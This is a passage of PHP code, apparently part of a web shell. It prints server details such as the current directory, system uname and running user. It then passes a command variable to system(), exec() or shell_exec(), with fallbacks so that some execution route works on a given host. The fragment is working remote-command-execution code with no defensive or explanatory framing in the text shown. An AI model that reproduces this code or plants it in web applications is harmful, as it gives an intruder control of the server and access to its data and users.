Date: ' . $date . ' | IP: ' . $ip . '
Current Directory: ' . getcwd() . '
Uname: ' . php_uname() . '
User: ' . (function_exists('get_current_user') ? get_current_user() : 'N/A') . '
';
if (function_exists('system')) {
system($cmd);
} elseif (function_exists('exec')) {
exec($cmd, $output);
echo implode("
", $output);
} elseif (function_exists('shell_exec')) {
echo shell_exec($cmd);
} else {
echo "No command execution function available!";
}
echo '